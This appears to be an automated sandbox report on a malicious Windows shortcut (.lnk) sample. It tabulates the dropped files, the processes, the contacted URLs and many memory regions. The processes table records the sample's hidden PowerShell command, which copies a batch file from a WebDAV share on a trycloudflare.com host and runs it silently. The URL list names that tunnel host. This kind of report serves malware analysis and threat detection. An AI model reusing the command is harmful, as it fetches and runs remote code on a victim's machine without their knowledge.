Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
dial2%20(2).Ink.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments,
Icon number=0, Archive, ctime=Fri Feb 2 17:37:06 2018, mtime=Fri Feb 2 17:37:12 2018, atime=Fri Feb 2 17:37:06 2018, length=446976,
window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nwmizi4.mvm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npbnqcxg.prb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\06VFN979D6F9VAOAY7LF.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\1c9a6b6d5b9db7b.customDesusertions-ms (copy)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat'
\"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://pizza-practices-representative-country.trycloudflare.com
|
unknown
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://pizza-practices-representative-country.trycloudflare.com.Z2
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 5 hidden URLs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FF88831C000
|
trusted library allocation
|
page execute and read and write
|
||
|
22017490000
|
heap
|
page execute and read and write
|
||
|
2202F7F9000
|
heap
|
page read and write
|
||
|
7FF8882C2000
|
trusted library allocation
|
page read and write
|
||
|
2201753B000
|
trusted library allocation
|
page read and write
|
||
|
22017210000
|
trusted library allocation
|
page read and write
|
||
|
7FF888370000
|
trusted library allocation
|
page read and write
|
||
|
22019013000
|
trusted library allocation
|
page read and write
|
||
|
2202F545000
|
heap
|
page read and write
|
||
|
7FF8885C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8883A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
C07C639000
|
stack
|
page read and write
|
||
|
22015561000
|
heap
|
page read and write
|
||
|
7FF8884B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
C07C0FE000
|
stack
|
page read and write
|
||
|
C07C3FE000
|
stack
|
page read and write
|
||
|
2202F760000
|
heap
|
page read and write
|
||
|
7FF888460000
|
trusted library allocation
|
page read and write
|
||
|
22015440000
|
heap
|
page read and write
|
||
|
7FF8884C0000
|
trusted library allocation
|
page read and write
|
||
|
22015400000
|
heap
|
page read and write
|
||
|
7FF888500000
|
trusted library allocation
|
page read and write
|
||
|
2202F4CC000
|
heap
|
page read and write
|
||
|
7FF88847A000
|
trusted library allocation
|
page read and write
|
||
|
7FF8885E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8882DB000
|
trusted library allocation
|
page read and write
|
||
|
7FF888590000
|
trusted library allocation
|
page read and write
|
||
|
22015780000
|
heap
|
page read and write
|
||
|
2202F4B0000
|
heap
|
page read and write
|
||
|
22018CEC000
|
trusted library allocation
|
page read and write
|
||
|
2202F630000
|
heap
|
page execute and read and write
|
||
|
220274C0000
|
trusted library allocation
|
page read and write
|
||
|
220174B1000
|
trusted library allocation
|
page read and write
|
||
|
22018CE4000
|
trusted library allocation
|
page read and write
|
||
|
C07C7BE000
|
stack
|
page read and write
|
||
|
220180E2000
|
trusted library allocation
|
page read and write
|
||
|
7FF8884A2000
|
trusted library allocation
|
page read and write
|
||
|
22017250000
|
heap
|
page readonly
|
||
|
22016EA5000
|
heap
|
page read and write
|
||
|
2202F51D000
|
heap
|
page read and write
|
||
|
2202F58F000
|
heap
|
page read and write
|
||
|
2202751E000
|
trusted library allocation
|
page read and write
|
||
|
7FF888560000
|
trusted library allocation
|
page read and write
|
||
|
22017497000
|
heap
|
page execute and read and write
|
||
|
C07C076000
|
stack
|
page read and write
|
||
|
C07C6B8000
|
stack
|
page read and write
|
||
|
220155AA000
|
heap
|
page read and write
|
||
|
C07C1FD000
|
stack
|
page read and write
|
||
|
C07C47D000
|
stack
|
page read and write
|
||
|
7FF888520000
|
trusted library allocation
|
page read and write
|
||
|
C07C27E000
|
stack
|
page read and write
|
||
|
C07C8BE000
|
stack
|
page read and write
|
||
|
220172D0000
|
heap
|
page read and write
|
||
|
C07C37E000
|
stack
|
page read and write
|
||
|
220155B0000
|
heap
|
page read and write
|
||
|
22027661000
|
trusted library allocation
|
page read and write
|
||
|
2201862F000
|
trusted library allocation
|
page read and write
|
||
|
22018D56000
|
trusted library allocation
|
page read and write
|
||
|
220154D8000
|
heap
|
page read and write
|
||
|
C07C53E000
|
stack
|
page read and write
|
||
|
2202F680000
|
heap
|
page read and write
|
||
|
22018CEA000
|
trusted library allocation
|
page read and write
|
||
|
22017240000
|
trusted library allocation
|
page read and write
|
||
|
C07D30F000
|
stack
|
page read and write
|
||
|
7FF888480000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8882E0000
|
trusted library allocation
|
page read and write
|
||
|
22015509000
|
heap
|
page read and write
|
||
|
7FF8885B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF888550000
|
trusted library allocation
|
page read and write
|
||
|
7FF8884D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF888570000
|
trusted library allocation
|
page read and write
|
||
|
7FF88837C000
|
trusted library allocation
|
page execute and read and write
|
||
|
C07C4F9000
|
stack
|
page read and write
|
||
|
22015785000
|
heap
|
page read and write
|
||
|
2202F76C000
|
heap
|
page read and write
|
||
|
C07C93B000
|
stack
|
page read and write
|
||
|
22016EA0000
|
heap
|
page read and write
|
||
|
2202F51A000
|
heap
|
page read and write
|
||
|
7FF888600000
|
trusted library allocation
|
page read and write
|
||
|
220153E0000
|
heap
|
page read and write
|
||
|
7FF8882D0000
|
trusted library allocation
|
page read and write
|
||
|
22017293000
|
trusted library allocation
|
page read and write
|
||
|
2202F660000
|
heap
|
page read and write
|
||
|
2201553E000
|
heap
|
page read and write
|
||
|
2202F7FC000
|
heap
|
page read and write
|
||
|
220172E3000
|
heap
|
page read and write
|
||
|
2202F547000
|
heap
|
page read and write
|
||
|
C07C17E000
|
stack
|
page read and write
|
||
|
7FF8885D0000
|
trusted library allocation
|
page read and write
|
||
|
220274B1000
|
trusted library allocation
|
page read and write
|
||
|
C07C73E000
|
stack
|
page read and write
|
||
|
7DF46BAA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22015583000
|
heap
|
page read and write
|
||
|
2202F550000
|
heap
|
page read and write
|
||
|
2202F778000
|
heap
|
page read and write
|
||
|
220154D0000
|
heap
|
page read and write
|
||
|
7FF888490000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF888610000
|
trusted library allocation
|
page read and write
|
||
|
2202F7F4000
|
heap
|
page read and write
|
||
|
7FF888380000
|
trusted library allocation
|
page execute and read and write
|
||
|
22015565000
|
heap
|
page read and write
|
||
|
7FF8884F0000
|
trusted library allocation
|
page read and write
|
||
|
220154E2000
|
heap
|
page read and write
|
||
|
7FF8883E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22017290000
|
trusted library allocation
|
page read and write
|
||
|
C07C5B7000
|
stack
|
page read and write
|
||
|
7FF8882C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF888376000
|
trusted library allocation
|
page read and write
|
||
|
C07C2FB000
|
stack
|
page read and write
|
||
|
220176E2000
|
trusted library allocation
|
page read and write
|
||
|
7FF8882CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF888471000
|
trusted library allocation
|
page read and write
|
||
|
7FF8882C4000
|
trusted library allocation
|
page read and write
|
||
|
7FF8885A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF888510000
|
trusted library allocation
|
page read and write
|
||
|
22015571000
|
heap
|
page read and write
|
||
|
7FF888580000
|
trusted library allocation
|
page read and write
|
||
|
22018D35000
|
trusted library allocation
|
page read and write
|
||
|
22018D92000
|
trusted library allocation
|
page read and write
|
||
|
22016E90000
|
heap
|
page read and write
|
||
|
C07C5BE000
|
stack
|
page read and write
|
||
|
220174A0000
|
heap
|
page execute and read and write
|
||
|
7FF888530000
|
trusted library allocation
|
page read and write
|
||
|
22015300000
|
heap
|
page read and write
|
||
|
220173F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF888540000
|
trusted library allocation
|
page read and write
|
||
|
2202F7A2000
|
heap
|
page read and write
|
||
|
220190DD000
|
trusted library allocation
|
page read and write
|
||
|
2202F7A5000
|
heap
|
page read and write
|
||
|
220190D8000
|
trusted library allocation
|
page read and write
|
||
|
7FF8884E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8885F0000
|
trusted library allocation
|
page read and write
|
||
|
22018D0A000
|
trusted library allocation
|
page read and write
|
There are 123 hidden memdumps, click here to show them.